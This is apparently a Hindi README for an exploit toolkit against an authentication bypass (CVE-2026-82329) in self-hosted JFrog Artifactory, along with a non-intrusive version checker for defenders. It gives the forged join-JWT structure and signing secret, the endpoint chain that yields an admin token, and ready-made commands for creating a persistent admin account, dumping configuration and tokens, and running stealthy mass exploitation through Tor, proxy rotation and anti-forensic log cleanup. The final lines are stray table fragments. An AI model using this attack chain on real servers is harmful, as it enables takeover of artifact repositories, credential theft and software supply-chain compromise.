
CVE-2026-82329 के लिए एक्सप्लॉइट और डिटेक्शन टूलकिट, जो JFrog Artifactory ऑथ बायपास है। एडमिन टोकन बनाने के लिए join JWTs को फोर्ज करता है; इसमें एक नॉन-इंट्रूसिव वर्ज़न चेकर शामिल है।

केवल नैतिक उपयोग हेतु – अधिकृत सुरक्षा परीक्षण
यह रिपॉज़िटरी केवल अधिकृत सुरक्षा पेशेवरों, ब्लू टीमों और पेनेट्रेशन टेस्टरों के लिए उपकरण प्रदान करती है।
कंप्यूटर सिस्टम तक अनधिकृत पहुँच CFAA (US), Computer Misuse Act (UK), TCK 243/244 (Turkey), और दुनिया भर के समान कानूनों के तहत अवैध है।
CVE‑2026‑82329 स्व-होस्टेड JFrog Artifactory (संस्करण से तक) में एक गंभीर प्रमाणीकरण बायपास भेद्यता है, जो एक अनधिकृत हमलावर को JFrog Access क्लस्टर जॉइन तंत्र का दुरुपयोग करके प्राप्त करने की अनुमति देती है।
32 * 0x20 (स्पेस) है।kid = SHA256("") से हस्ताक्षरित एक HS256 JWT को नकली बनाता है।POST /access/api/v1/registry/join बिना किसी प्रमाणीकरण के scp=admin के साथ एक SERVICE टोकन लौटाता है।scope=applied-permissions/admin&audience=* के साथ POST /access/api/v1/tokens एक पूर्ण प्लेटफ़ॉर्म एडमिन टोकन देता है।| उपकरण | उद्देश्य | इच्छित उपयोगकर्ता |
|---|---|---|
exploit.py | JWT फोर्जिंग, एडमिन टोकन एक्सचेंज, एडमिन उपयोगकर्ता निर्माण, मास स्कैनिंग, स्टील्थ मोड, प्रॉक्सी रोटेशन, इंटरैक्टिव मेनू, और पूर्ण हमला श्रृंखला के साथ पूर्ण हथियारबंद टूलकिट। | रेड टीमें / अधिकृत पेंटेस्टर |
safechecker.py | गैर-घुसपैठिया भेद्यता चेकर जो Artifactory संस्करण का पता लगाता है, एक्सपोज़र को मान्य करता है, और बिना कोई टोकन प्राप्त किए या कोई पेलोड निष्पादित किए जोखिम का आकलन करता है। JSON रिपोर्ट उत्पन्न करता है। | ब्लू टीमें / सुरक्षा ऑडिटर |
| विशेषता | exploit.py | safechecker.py |
|---|---|---|
| भेद्यता का पता लगाना | ✅ | ✅ |
| संस्करण का पता लगाना | ✅ | ✅ |
| नकली जॉइन JWT | ✅ | ❌ |
| सर्विस टोकन मिंट | ✅ | ❌ |
| एडमिन टोकन एक्सचेंज | ✅ | ❌ |
| एडमिन उपयोगकर्ता निर्माण | ✅ | ❌ |
| रिपॉज़िटरी सूचीबद्ध करें | ✅ | ❌ |
| उपयोगकर्ता सूचीबद्ध करें | ✅ | ❌ |
| कॉन्फ़िगरेशन डंप करें | ✅ | ❌ |
| टोकन डंप करें | ✅ | ❌ |
| पूर्ण हमला श्रृंखला | ✅ | ❌ |
| इंटरैक्टिव मेनू | ✅ | ❌ |
| मास स्कैनिंग (मल्टी-थ्रेड) | ✅ | ✅ |
| प्रॉक्सी समर्थन | ✅ | ✅ |
| प्रॉक्सी रोटेशन | ✅ | ❌ |
| Tor समर्थन (गुमनामी) | ✅ | ❌ |
| User‑Agent रोटेशन (OPSEC) | ✅ | ❌ |
| जिटर (OPSEC) | ✅ | ❌ |
| अनुकूली दर सीमक | ✅ | ❌ |
| गैर-घुसपैठिया (सुरक्षित) मोड | ❌ | ✅ |
| संस्करण रिपोर्ट | ✅ | ✅ |
| अनाम पहुँच जाँच | ❌ | ✅ |
| JSON रिपोर्ट | ✅ | ✅ |
| परिदृश्य | अनुशंसित उपकरण |
|---|---|
| ब्लू टीम – यह सत्यापित करना कि आपका Artifactory भेद्य है या नहीं | safechecker.py |
| सुरक्षा ऑडिट – गैर-घुसपैठिया भेद्यता मूल्यांकन | safechecker.py |
| रेड टीम – पूर्ण शोषण के साथ अधिकृत पेनेट्रेशन परीक्षण | exploit.py |
| बग बाउंटी – जिम्मेदार प्रकटीकरण परीक्षण | safechecker.py |
| मास स्कैनिंग – भेद्यता के लिए कई लक्ष्यों की जाँच | exploit.py (केवल-पहचान) |
| घटना प्रतिक्रिया – यह जाँचना कि सिस्टम से समझौता हुआ है या नहीं | safechecker.py |
git clone https://github.com/tc4dy/CVE-2026-82329-PoC-Exploit
cd CVE-2026-82329-PoC-Exploit
pip install -r requirements.txt
requests
urllib3
curl_cffi
exploit.py पैरामीटर| पैरामीटर | विवरण |
|---|---|
-u, --url | एकल लक्ष्य Artifactory URL (जैसे http://artifactory.example.com:8082) |
-f, --file | मास स्कैनिंग के लिए लक्ष्यों की सूची वाली फ़ाइल (प्रति पंक्ति एक) |
--create-admin | स्थायी एडमिन उपयोगकर्ता बनाएँ (प्रारूप: USER:PASS) |
--keep-admin | बनाए गए एडमिन उपयोगकर्ता को रखें (स्कैन के बाद सफ़ाई न करें) |
--token-only | केवल एडमिन टोकन प्रिंट करें (एकल लक्ष्य) |
--interactive | शोषण के बाद इंटरैक्टिव मेनू |
--service-id | जॉइन JWT के लिए सर्विस ID (डिफ़ॉल्ट: jfrt@01) |
-t, --threads | मल्टी-टार्गेट के लिए थ्रेड्स की संख्या (डिफ़ॉल्ट: 10) |
--timeout | अनुरोध टाइमआउट (डिफ़ॉल्ट: 25s) |
--retry | अधिकतम पुनः प्रयास (डिफ़ॉल्ट: 3) |
--proxy | HTTP/HTTPS प्रॉक्सी (जैसे http://127.0.0.1:8080) |
--proxy-list | रोटेशन के लिए प्रॉक्सी वाली फ़ाइल (प्रति पंक्ति एक) |
--jitter | अनुरोधों के बीच यादृच्छिक जिटर (0‑2 सेकंड) |
--stealth | स्टील्थ मोड सक्षम करें (UA रोटेशन + X‑Forwarded‑For) |
--curl-cffi | TLS फिंगरप्रिंट प्रतिरूपण के लिए curl_cffi का उपयोग करें |
--full | पूर्ण हमला: सभी मॉड्यूल |
--dump-config | सिस्टम कॉन्फ़िगरेशन डंप करें |
--dump-tokens | सभी एक्सेस टोकन डंप करें |
--list-repos | रिपॉज़िटरी सूचीबद्ध करें |
--list-users | उपयोगकर्ता सूचीबद्ध करें |
--detect | केवल पहचान (कोई एडमिन टोकन एक्सचेंज नहीं) |
safechecker.py पैरामीटर| पैरामीटर | विवरण |
|---|---|
-u, --url | एकल लक्ष्य Artifactory URL (जैसे http://artifactory.example.com:8082) |
-f, --file | लक्ष्यों की सूची वाली फ़ाइल (प्रति पंक्ति एक) |
-t, --threads | मल्टी-टार्गेट के लिए थ्रेड्स की संख्या (डिफ़ॉल्ट: 5) |
--timeout | अनुरोध टाइमआउट (डिफ़ॉल्ट: 10s) |
-v, --verbose | विस्तृत आउटपुट |
-o, --output | JSON रिपोर्ट फ़ाइल में सहेजें |
| # | परिदृश्य | कमांड |
|---|---|---|
| 1 | त्वरित भेद्यता जाँच | python safechecker.py -u http://artifactory.example.com:8082 |
| 2 | रिपोर्ट के साथ विस्तृत स्कैन | python safechecker.py -u http://artifactory.example.com:8082 -o report.json -v |
| 3 | फ़ाइल से मास ऑडिट | python safechecker.py -f targets.txt -t 10 -o audit.json |
| 4 | केवल-पहचान शोषण | python exploit.py -u http://artifactory.example.com:8082 --detect |
| 5 | केवल एडमिन टोकन प्राप्त करें | python exploit.py -u http://artifactory.example.com:8082 --token-only |
| 6 | इंटरैक्टिव मेनू के साथ पूर्ण हमला | python exploit.py -u http://artifactory.example.com:8082 --interactive |
| 7 | स्थायी एडमिन उपयोगकर्ता बनाएँ | python exploit.py -u http://artifactory.example.com:8082 --create-admin evil:P@ssw0rd1 --keep-admin |
| 8 | कॉन्फ़िगरेशन डंप करें | python exploit.py -u http://artifactory.example.com:8082 --dump-config |
| 9 | रिपॉज़िटरी और उपयोगकर्ता सूचीबद्ध करें | python exploit.py -u http://artifactory.example.com:8082 --list-repos --list-users |
| 10 | स्टील्थ के साथ मास शोषण | python exploit.py -f targets.txt -t 20 --stealth --jitter --full -o results.json |
| 11 | Tor के साथ प्रॉक्सी रोटेशन | python exploit.py -f targets.txt --proxy-list proxies.txt --curl-cffi --stealth |
एक्सप्लॉइट निम्नलिखित JFrog एंडपॉइंट और शोषण चरणों का उपयोग करता है:
| चरण | विधि | एंडपॉइंट | विवरण |
|---|---|---|---|
| 1. जॉइन | POST | /access/api/v1/registry/join | नकली HS256 JWT → SERVICE टोकन (scp=admin) |
| 2. एक्सचेंज | POST | /access/api/v1/tokens | SERVICE टोकन → प्लेटफ़ॉर्म एडमिन टोकन |
| 3. प्रमाण | GET | /artifactory/api/system/configuration | पहुँच का एडमिन-केवल प्रमाण |
| 4. बनाए रखें | PUT | /artifactory/api/security/users/{user} | स्थायी एडमिन उपयोगकर्ता बनाएँ |
| 5. रद्द करें | DELETE | /access/api/v1/tokens/{id} | बनाए गए टोकन की सफ़ाई |
# Forged join JWT structure
{
"alg": "HS256",
"typ": "JWT"
}
{
"iat": <unix_timestamp>,
"service_id": "jfrt@01",
"kid": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"skip_node_registration": true
}
# Signing secret
secret = b"\x20" * 32
# Admin token request
scope=applied-permissions/admin&audience=*&expires_in=0&refreshable=false
यह सॉफ़्टवेयर केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।
| लॉग सफ़ाई (एंटी-फोरेंसिक) |
| ✅ |
| ❌ |
| कस्टम User‑Agent | ✅ | ✅ |
| SSL सत्यापन नियंत्रण | ✅ | ✅ |
--exploit | पूर्ण शोषण करें |
-o, --output | JSON रिपोर्ट फ़ाइल में सहेजें |
-v, --verbose | विस्तृत आउटपुट |
-q, --quiet | शांत मोड |